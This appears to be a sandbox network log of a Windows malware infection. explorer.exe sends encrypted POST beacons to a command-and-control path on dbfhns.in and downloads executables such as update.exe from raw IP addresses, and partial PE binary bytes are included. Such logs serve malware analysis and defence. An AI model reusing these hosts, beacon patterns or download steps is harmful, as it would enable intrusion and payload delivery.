                                                                              May 26, 2024 10:22:26.743766069 CEST181OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 2f 28 b3 f1
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA -[k,vu/(kktDL2B]#<(L:/F8FB?cm o10
                                                                              May 26, 2024 10:22:27.739417076 CEST484INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:22:27 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.449740190.28.110.209802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:22:28.089696884 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://jpbahollcwbghe.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 118
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:22:28.089696884 CEST118OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 49 36 fa e4
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA -[k,vuI6NE{[mn&Epgp[[
                                                                              May 26, 2024 10:22:28.865943909 CEST484INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:22:28 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.449741190.28.110.209802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:22:30.290385008 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://oygcwhbcxoopv.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 278
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:22:30.290435076 CEST278OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 56 36 bf bb
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA -[k,vuV6|?\w|R;JADzqflE)@f}.]J]7B+h&**-W5]E;Sok3B|E#)-a
                                                                              May 26, 2024 10:22:31.303996086 CEST191INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:22:31 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1
                                                                              Data Ascii: #\-^$aD++3^|


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.44974245.129.96.86802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:22:31.411853075 CEST165OUTGET /file/update.exe HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Host: 45.129.96.86
                                                                              May 26, 2024 10:22:32.124344110 CEST1236INHTTP/1.1 200 OK
                                                                              Server: nginx/1.22.1
                                                                              Date: Sun, 26 May 2024 08:22:31 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 325120
                                                                              Last-Modified: Sun, 26 May 2024 08:20:02 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "6652f0b2-4f600"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 5b 37 b0 84 3a 59 e3 84 3a 59 e3 84 3a 59 e3 89 68 86 e3 98 3a 59 e3 89 68 b9 e3 09 3a 59 e3 89 68 b8 e3 aa 3a 59 e3 8d 42 ca e3 8d 3a 59 e3 84 3a 58 e3 e7 3a 59 e3 31 a4 bc e3 85 3a 59 e3 89 68 82 e3 85 3a 59 e3 31 a4 87 e3 85 3a 59 e3 52 69 63 68 84 3a 59 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e 81 f9 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 0c 01 00 00 74 08 00 00 00 00 00 86 3d 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 09 00 00 04 00 00 70 bc 05 00 02 00 00 81 00 00 [TRUNCATED]
                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$[7:Y:Y:Yh:Yh:Yh:YB:Y:X:Y1:Yh:Y1:YRich:YPELct= @pdHx@ d.text3 `.rdatal n@@.dataF~@.rsrcL@@
                                                                              May 26, 2024 10:22:32.126277924 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 24 c5 48 00 e8 27 02 00 00 68 29 1b 41 00 e8 0f 24 00 00 59 c3 b9 2c c5 48 00 e8 7a 02 00 00 68 1f 1b 41
                                                                              Data Ascii: $H'h)A$Y,HzhA#YHhA#Yj HjHj(HjHUQQQQ$]EYY]UQQQQ$$]EYY]UE]
                                                                              May 26, 2024 10:22:32.131109953 CEST1236INData Raw: 89 45 e4 8b 4d e8 8b c3 d3 e8 89 45 f8 8b 45 d4 01 45 f8 8b 45 f8 33 45 e4 31 45 fc 8b 45 fc 29 45 ec 8b 4d d0 81 c7 47 86 c8 61 89 7d f0 4e 0f 85 29 ff ff ff 8b 75 cc 8b 45 ec 5f 89 5e 04 89 06 5e 5b 8b e5 5d c3 56 8b 35 08 c5 48 00 c1 ee 03 57
                                                                              Data Ascii: EMEEEE3E1EE)EMGa}N)uE_^^[]V5HW=HtNu_^UQeEEH]USSV3W=$ AS8q Fr|HAKQSHHd AMHQj@
                                                                              May 26, 2024 10:22:32.135941029 CEST1236INData Raw: 59 18 81 44 24 20 f4 2a 9d 04 81 44 24 30 ea 66 bb 37 81 44 24 14 40 02 87 21 b8 3d d8 cd 38 f7 64 24 1c 8b 44 24 1c 81 6c 24 0c 1a 75 11 74 b8 31 7a bb 79 f7 64 24 1c 8b 44 24 1c 81 6c 24 30 ff 4d 18 6e 81 44 24 20 6c 8f e2 39 b8 b9 1b f5 11 f7
                                                                              Data Ascii: YD$ *D$0f7D$@!=8d$D$l$ut1zyd$D$l$0MnD$ l9d$D$l$l$k`l$09D$$^l$?OsRZd$D$<-md$,D$,l$/l$8|BD$+_D$`0D$$PM'"d$ D$ fpmd$PD$PD$,EAl$<eACj02
                                                                              May 26, 2024 10:22:32.135978937 CEST1236INData Raw: 56 e8 d4 00 00 00 eb 2b 80 7d 0c 00 74 19 83 fe 10 73 14 8b 47 10 8b cf 3b f0 0f 42 c6 50 6a 01 e8 2f fe ff ff eb 0c 85 f6 75 08 56 8b cf e8 87 ff ff ff 33 c0 3b c6 5f 1b c0 f7 d8 5e 5d c2 08 00 8b cf e8 31 00 00 00 cc 55 8b ec 83 7d 08 00 57 8b
                                                                              Data Ascii: V+}tsG;BPj/uV3;_^]1U}WtI9Er=G;Ev2_]hxAhxAU]faayrUQEPN3B;HF]ASVuWe
                                                                              May 26, 2024 10:22:32.145577908 CEST1236INData Raw: f9 80 00 00 00 0f 82 ce 01 00 00 8b c7 33 c6 a9 0f 00 00 00 75 0e 0f ba 25 18 90 41 00 01 0f 82 da 04 00 00 0f ba 25 30 5e 44 00 00 0f 83 a7 01 00 00 f7 c7 03 00 00 00 0f 85 b8 01 00 00 f7 c6 03 00 00 00 0f 85 97 01 00 00 0f ba e7 02 73 0d 8b 06
                                                                              Data Ascii: 3u%A%0^Dsvs~vftcfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}vfoNvIfo^0f
                                                                              May 26, 2024 10:22:32.148526907 CEST1236INData Raw: 47 02 8b 44 24 0c 5e 5f c3 90 8a 46 03 88 47 03 8a 46 02 88 47 02 8a 46 01 88 47 01 8b 44 24 0c 5e 5f c3 8d a4 24 00 00 00 00 57 8b c6 83 e0 0f 85 c0 0f 85 d2 00 00 00 8b d1 83 e1 7f c1 ea 07 74 65 8d a4 24 00 00 00 00 90 66 0f 6f 06 66 0f 6f 4e
                                                                              Data Ascii: GD$^_FGFGFGD$^_$Wte$fofoNfoV fo^0ffOfW f_0fof@fonPfov`fo~pfg@foPfw`fpJutOtfofvJut*tvIutFGIu
                                                                              May 26, 2024 10:22:32.148562908 CEST108INData Raw: 8f f0 8b 44 8e f4 89 44 8f f4 8b 44 8e f8 89 44 8f f8 8b 44 8e fc 89 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 f8 2c 40 00 8b ff 08 2d 40 00 10 2d 40 00 1c 2d 40 00 30 2d 40 00 8b 44 24 0c 5e 5f c3 90 8a 06 88 07 8b 44 24 0c 5e 5f c3 90
                                                                              Data Ascii: DDDDDD$,@-@-@-@0-@D$^_D$^_FGD$^_IF
                                                                              May 26, 2024 10:22:32.148592949 CEST1236INData Raw: 01 88 47 01 8a 46 02 88 47 02 8b 44 24 0c 5e 5f c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 00 00 75 24 c1 e9 02 83 e2 03 83 f9 08 72 0d fd f3 a5 fc ff 24 95 94 2e 40 00 8b ff f7 d9 ff 24 8d 44 2e 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c
                                                                              Data Ascii: GFGD$^_t1|9u$r$.@$D.@Ir+$-@$.@-@-@-@F#Gr$.@IF#GFGr$.@F#GFGFGV$.@IH
                                                                              May 26, 2024 10:22:32.154166937 CEST1236INData Raw: 00 00 00 00 8b ff 8b 4c 24 04 57 f7 c1 03 00 00 00 74 13 8a 01 83 c1 01 84 c0 74 3d f7 c1 03 00 00 00 75 ef 8b ff 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 83 c1 04 a9 00 01 01 81 74 e8 8b 41 fc 84 c0 74 23 84 e4 74 1a a9 00 00 ff 00 74 0e a9 00
                                                                              Data Ascii: L$Wtt=u~3tAt#tttyyyyL$ttfu~3tt4t'ttD$_fD$G_fD$_D$_Vjj
                                                                              May 26, 2024 10:22:32.154206038 CEST1236INData Raw: 03 8b 7d 0c 56 e8 e3 32 00 00 8b 46 0c 59 84 c0 79 08 83 e0 fc 89 46 0c eb 16 a8 01 74 12 a8 08 74 0e a9 00 04 00 00 75 07 c7 46 18 00 02 00 00 53 57 56 e8 25 2d 00 00 59 50 e8 d2 30 00 00 83 c4 0c 33 c9 83 f8 ff 0f 95 c1 5f 5b 8d 41 ff 5e 5d c3
                                                                              Data Ascii: }V2FYyFttuFSWV%-YP03_[A^]jh~Ae3uul<}ttuV+YeWuV}Eu}VcYQ0A3YUAPEPL


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.449743190.28.110.209802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:22:32.694240093 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://fjtoifbsexibjqos.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 220
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:22:32.694240093 CEST220OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2c 5b 0e 6b 2c 90 f4 76 0b 75 58 01 e4 ad
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA ,[k,vuX{hbAd#K21{mX_IQZN*=oK\5%Gt!yKF[rCt
                                                                              May 26, 2024 10:22:33.661588907 CEST484INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:22:33 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.449744190.28.110.209802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:22:33.788541079 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://eaiecpphhehnp.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 237
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:22:33.788656950 CEST237OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 7a 06 b7 bd
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA -[k,vuzWeBOdt<Vq_Z)`c( CVTPi(DU~y~M47[Cj3?>={DGX8x7WE
                                                                              May 26, 2024 10:22:34.788914919 CEST484INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:22:34 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.449746190.28.110.209802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:22:34.953458071 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://ohbpdxbbqxsqjiv.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 190
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:22:34.953458071 CEST190OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 48 48 ef 82
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA -[k,vuHHMjkD+M,=W0FDB)(!i|83hXz<w
                                                                              May 26, 2024 10:22:35.977900028 CEST484INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:22:35 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.449748190.28.110.209802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:22:36.018013000 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://thknwrjryktui.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 280
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:22:36.018013000 CEST280OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 5d 08 bb a2
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA -[k,vu]qSbqf"^sBS2{5^m=\xvI5Tv/0;1YRYJG~$ZGZ<PTz\Ffax:
                                                                              May 26, 2024 10:22:37.056701899 CEST190INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:22:36 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 58 24 17 a0 6d 44 af a8 09 a2 cc b6 e5 32 9d 20 c1 e0 2a 0b 19 9a c4 8a d6 61
                                                                              Data Ascii: #\+X$mD2 *a


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.44974923.145.40.124802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:22:37.156466961 CEST164OUTGET /pintxi1lv.exe HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Host: 23.145.40.124


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              12192.168.2.452654185.235.137.54803192C:\Users\user\AppData\Local\Temp\F441.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:22:44.658499956 CEST205OUTGET /file/host_so.exe HTTP/1.1
